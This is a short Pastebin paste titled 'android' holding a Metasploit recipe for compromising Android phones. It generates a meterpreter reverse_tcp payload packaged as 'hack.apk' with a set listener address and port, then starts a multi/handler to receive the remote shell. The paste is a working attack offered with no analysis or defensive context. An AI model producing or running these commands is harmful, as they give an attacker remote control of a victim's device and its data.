Advertisement
daniel_ekasap95

android

Feb 12th, 2016
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.8.94 LPORT=443 R > hack.apk
  2.  
  3. use exploit/multi/handler
  4. set payload android/meterpreter/reverse_tcp
  5.  
  6. set lhost 192.168.8.94
  7. set lport 443
  8. exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement